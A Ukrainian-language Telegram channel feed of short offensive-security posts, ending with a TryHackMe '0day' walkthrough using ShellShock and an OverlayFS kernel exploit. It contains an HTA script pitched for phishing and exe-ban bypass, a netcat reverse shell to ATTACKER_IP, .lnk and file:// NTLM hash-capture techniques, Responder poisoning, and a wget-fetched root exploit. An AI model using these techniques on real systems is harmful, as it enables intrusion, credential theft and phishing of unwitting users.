БезПК
34 subscribers
19 photos
1 video
3 files
32 links
Кібербез. Трохи того, трохи цього. Трохи вас, трохи нас
Download Telegram
Стосовно thm

Проходжу модуль по c2(command and control)
І піднімається там один цікавий метод(а може і не один) ховання malicious трафіку. C2 Profiles.


Суть:
Ви запустили сервак, https, і ваш малварь шле туди запити для виконування команд. Їх ловить soc команда. Звісно через те що трафік https - бачить тільки куди запити йдуть. Умовний pillows.com. І всім соком йдуть туди, шерстять ваш сайт, але там тільки подушки...
Чому? Тому що ваш сайт налаштований reverse proxy чи ще чимось таким, віддавати malware трафік тільки користувачам, які вказали умовний хедер
Sezam: Open

Не маєш такого хедера - купуєш подушки, маєш - шлеш команди і отримуєш вивід.


GL
3👍1
This media is not supported in your browser
VIEW IN TELEGRAM
Мем пижджений, я - недостатньо
😁51
А ми створимо свій HTML, з блек джеком, мамзельками і виконуванням системних команд!
Ніколи не виникало відчуття, що в html сторінках не вистачає шарму? Емоцій? A little bit of SPICE.

Прошу любити і шанувати, формат HTA - прикол від майкрософта, який дозволяє і html рендерити і скріпти виконувати

<html>
<body>
<script>
var c= 'cmd.exe'
new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>


Варіант байпасу заборон на exe файли, плюс, наскільки бачу, дефендер не ругається. Плюс підійде для фішингу не дуже вумних. Всі знають що exe запускати не можна, про hta ж не говорили?
3
Привіт шановні. Терпіти не можу лагучий шматок лайна на Телеграфі, але люто хочу вставляти скріншоти. Тому спробую в медіум. Відкритий до пропозицій. З плюсів - можна використати прев'ю телеграму для цього всього.
https://medium.com/@BezPC/insecure-shop-start-hardcoded-credentials-fd5a804697d5
2
Інформую, метасплойт має встроєний функціонал щоб слухати вас і грати вам музику
😁4🔥1
Думаю бачили таку команду і певне юзали на CTF?
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc ATTACKER_IP ATTACKER_PORT >/tmp/f

Я, як багато із вас просто копіпастив, не дуже розбираючись, що воно робить. Реверс шел є реверс шел.
Але сьогодні розберу:
rm -f /tmp/f;

Це просто видалення файлу /tmp/f якщо він існує(тому що ми будемо такий же створювати, і щоб не мати проблем)

mkfifo /tmp/f;

Це якраз те створення файлу. А файл - іменована пайпа, по факту буфер обміну для ваших процесів


cat /tmp/f


Читаємо її вміст

 sh -i 2>&1

І передаємо в sh(shell) в інтерактивному режимі. А 2>&1 - редірект виводу помилок(2) в стандартний вивід(1)

 nc ATTACKER_IP ATTACKER_PORT >/tmp/f

А це відкриває сесію неткату до атакуючого хоста, і його вміст записує до файлу /tmp/f
І цикл замикається - ми пишемо до пайпи, вона пише нам, і по кругу. Сподіваюсь, стало легше для розуміння.
👍21
До речі bind shell - буквально все те ж, тільки слухає вже жертва
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | bash -i 2>&1 | nc -l 0.0.0.0 8080 > /tmp/f

І відповідно вивід баша передається на слухаюче підключення
nc -l 0.0.0.0 8080
1
Ранку, шановні!
Написав це в статті, але не всі(нажаль) читають. З Різдвом всіх причетних!
Спокою в сімейному колі і безпеки для близьких 🧑‍🎄☃️🎄❄️
А я, тим часом знову в гівні мобілках, сьогодні про активності і їх приватність. Гарного перегляду!
https://medium.com/@BezPC/insecure-shop-intent-redirection-access-to-protected-components-d008c1883bb1
7
Заглиблюємося! 🌊🌊🌊🌊
(Постараюсь далі щось інше)
А зараз - мобілки, цього разу - викрадання файлів з апки, яка пише бекапи в спільні папки. Здається тут легко для розуміння. Всі питання в коменти, всім продуктивного дня

https://medium.com/@BezPC/insecure-shop-theft-of-arbitrary-files-from-local-storage-49cdb6c6e07f
5👍2🔥1
Хо -Хо-Хотілося б привітати вас шановні. В прийдешньому році бажаю сил і наснаги. Треба рухатися, бо ніхто крім нас цього не зробить. Бажаю надійних і головне розуміючих людей поруч. Бажаю відчути що все на своїх місцях.
Тим кому важко - не киснути, це ділу не допомагає. "Що всратися й сидіти?"
І кожеш фініш це по суті старт ☃️

Сумбурно написав. День цей я провів в потугах побороти синдром самозванця. Тикався в баг баунті(засабмітив info disclosure, може похвалять) і за порадою одного з амбасадорів цього каналу, тикнувся в російську інфру. Якась газета локальна також приєднується до привітань.
З вірою у світле майбутнє, BezPC
7
Що таке любов? Любов - це чекати скільки треба. Чи то чекати поки вона обере річ в магазині, чи то поки набрутиться хеш, чи то поки напише статтю шикарний техноблогер🫀 - все це любов. Дякую всім хто чекав, люблю вас. За цей період я встиг непогано похворіти, знайти нову роботу. У вирі подій не забував про вас!🫀🫀🫀
Ще пройшов курс по малварь аналізу, для загального ознайомлення піде.

Накачав піратських книжечок(дайте знати і кину). В одній з них, по пентесту AD був наведений приклад з використанням SCF файлу. Але атака не актуальна для 10 вінди. Але чатгпт порадив сучасний аналог - через link(.lnk) файл. Суть наступна:
Ми проламали базовий захист і маємо доступ на запис до шари. Якоїсь максимально спільної, на яку бухгалтери записують документи. Можна звісно накидати туди "ЗапустиМене.exe", але є трошки елегантніший спосіб. Відразу попереджу, що працює рідко, бо треба зловити адміна, який вимкнув налаштування безпеки smb вінди, але спробувати можна.
5👍1😍1
Ми створюємо .lnk файл, який робимо посиланням на нашу шару. І якщо в адміна, або іншого користувача вимкнені механізми захисту(так часом роблять, тестувальники і тд) то ми ловимо його NTLM хеш, який далі можна брутити, або використовувати в атаці Pass the Hash.
Реалізація:
1. Створюємо ярлик(можна в себе, потім закинете)
$ShortcutPath = "C:\path\to\your\attack.lnk"
$TargetPath = "\\attacker_ip\path\to\responder.exe"
$WScriptShell = New-Object -ComObject WScript.Shell
$Shortcut = $WScriptShell.CreateShortcut($ShortcutPath)
$Shortcut.TargetPath = $TargetPath
$Shortcut.Save()

2. Запускаємо імпакет або респондер
sudo impacket-smbserver  -smb2support share .

3. Чекаємо!
Прикол в тому, що для того аби підвантажити зображення іконки нашого ресурсу - вінда буде надсилати автентифіковані запити, з хешем і користувачем, навіть якщо він не відкривав наш ярлик. І якщо зорі на нашій стороні - отримуємо те що ви бачите на скріні.
4👍1😍1
Привіт!
Продовжуючи тему попереднього відоса - атаки на AD. Найбазовіше, що радять робити як тільки потрапляєш в мережу - запускати responder. Що ж це таке? Це тулза яка спеціалізується на атаках типу LLMNR/NBT-NS/MDNS poisoning. Суть атаки: клієнт хоче підключитися до шари по хостнейму, типу MyPC, але випадково натискає не ту клавішу і шукає вже MyPCC. І логічно - не знаходить. Тоді, в потугах останньої надії він надсилає мультикаст запит всім-всім в мережі. "А чи не знає ніхто хто такий MyPCC?". І зазвичай ніхто не знає. А ми знаємо, ми все знаємо!
І відповідь завжди одна - я. Я MyPCC, я PussyDestroyer2017, я IronMan. Ми відповідаємо абсолютно на всі запити собою. Нащо? А бо далі, клієнт нам повірить і почне авторизацію, надсилаючи свої авторизаційні дані, хеш паролю, юзернейм і тд. А нам лишається тільки набрутити його пароль офлайн.
5
Ще, окрім варіанту містайпу назви шари, є варіант з HTML документом. Протестовано на останній версії вінди.
Ти отримуєш контент за допомогою тегів iframe/img і src вказаним у форматі
file://bezpk/share/

(обов'язково без доменного імені/білого айпі, бо піде по мережі)
В такому випадку вінда шукає шару, на якій цей файл і відповідно шле preauth. Тому як killchain від bezpc:
1. Проникаємо в мережу якимось вебшелом чи просто в рамках пентесту.
2. Вмикаємо Responder
3. Шлемо користувачам лист з url, на сервак який ми контролюємо(можна, наприклад webhooks)
4. Користувачі, або навіть команда безпеки(при аналізі) переходить по url
5. Ловимо хеші і користувачів.
Попрошу лайк за геніальність))
6
SnortCheatsheet-TryHackMe-1647343678716.pdf
601.8 KB
Snort - IPS/IDS, штука що детектить патерни в трафіку і або блокує, або алертить аналітикам. Ось вам пам'ятка з THM
4
0day: THM Write-Up
Exploiting Ubuntu via ShellShock and OverlayFS Vulnerability
Привіт, шановні пан-крипкери та ентузіасти пентесту! Сьогодні ми розберемо цікавий челендж з TryHackMe під назвою "0day". Ця машина демонструє класичні вразливості в Ubuntu, які дозволяють отримати повний контроль над системою. Готуйтеся до черепашок, кролячих нор та ядерних експлойтів!

(посилання на кімнату: https://tryhackme.com/room/0day)

🔍 Phase 1: Reconnaissance
Наш перший крок - зрозуміти, з чим ми маємо справу. Запускаємо nmap сканування:


nmap -sC -sV -v $IP

Результати:

Port 22/tcp: OpenSSH 6.6.1p1 (Ubuntu) - стара версія, варто запам'ятати
Port 80/tcp: Apache 2.4.7 (Ubuntu) - головна ціль для атаки

Далі використовуємо feroxbuster для знаходження прихованих директорій:

(feroxbuster — це інструмент для швидкого виявлення директорій та файлів на веб-серверах через форсований перебір шляхів із словників.)

feroxbuster -u http://$IP/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
Цікаві знахідки:

/secret/turtle.png — черепашка? Спочатку я не зрозумів, що це, проте пошук у Google та підказки від ChatGPT вказали на явний натяк на ShellShock!
(https://beaglesecurity.com/blog/vulnerability/shellshock-bash-bug.html)

/cgi-bin/ - потенційний вектор атаки ShellShock

/backup/ - містить зашифрований RSA ключ, цікаво?)

🔑 Phase 2: Initial Access
The Rabbit Hole (RSA Key)
У директорії /backup знаходимо зашифрований приватний ключ. Спробуємо його розшифрувати:

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4, ENCRYPTED
DEK-Info: AES-128-CBC,82823EE792E75948EE2DE731AF1A0547

T7+F+3ilm5FcFZx24mnrugMY455vI461ziMb4NYk9YJV5uwcrx4QflP2Q2V...
-----END RSA PRIVATE KEY-----



/usr/share/john/ssh2john.py id_rsa > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Отримуємо пароль без відповідного користувача - це класична "кроляча нора". Не витрачаємо час і рухаємось далі!

ShellShock Exploitation
Черепаха в /secret - це явний натяк на CVE-2014-6271 (ShellShock).

(ShellShock — це критична вразливість у Bash (CVE-2014-6271), яка дозволяє віддалено виконувати довільний код на сервері через спеціально сформовані змінні середовища.
Простими словами:
Bash неправильно обробляє змінні середовища.
Якщо в певному CGI-скрипті (/cgi-bin/) можна вставити шкідливу команду в заголовок запиту (наприклад, в User-Agent чи Cookie), то сервер виконає цю команду замість простої обробки змінної.)


Використовуємо Metasploit: (можна також через git clone https://github.com/nccgroup/shocker.git)


msfconsole
use exploit/multi/HTTP/apache_mod_cgi_bash_env_exec
set RHOSTS $IP
set TARGETURI /cgi-bin/test.cgi
set LHOST $YOURIP
exploit
Boom! Отримуємо Meterpreter сесію (www-data). Перший прапорець вже наш:
cat /home/user/user.txt
THM{Sh3llSh0ck_r0ckz}

📌 Phase 3: Privilege Escalation
Kernel Exploitation
Перевіряємо версію ядра:


uname -a
Linux 0day 3.19.0-25-generic #26~14.04.1-Ubuntu SMP ...
Знаходимо вразливість CVE-2015-1328 (overlayfs)
(https://www.exploit-db.com/exploits/40688).
CVE-2015-1328 — вразливість в OverlayFS у Linux до 3.19.0-25, яка дозволяє локальному користувачу через некоректне монтування змінити системні файли й отримати root-доступ; наприклад, можна змонтувати каталог /tmp поверх /etc і підмінити passwd для ескалації привілеїв.Використовуємо готовий експлойт:
( або ж далі metasploit linux/local/overlayfs_priv_esc)


searchsploit overlayfs
# Завантажуємо експлойт на машину
wget http://$YOURIP/37292.c -O /tmp/exploit.c
gcc exploit.c -o exploit
chmod +x exploit
python -m http.server
Переходимо на вразливий сервер і вводимо команду
wget http://$YOURIP/exploit
./exploit
Root acquired! Отримуємо останній прапорець:


cat /root/root.txt
THM{g00d_j0b_0day_is_Pleased}
3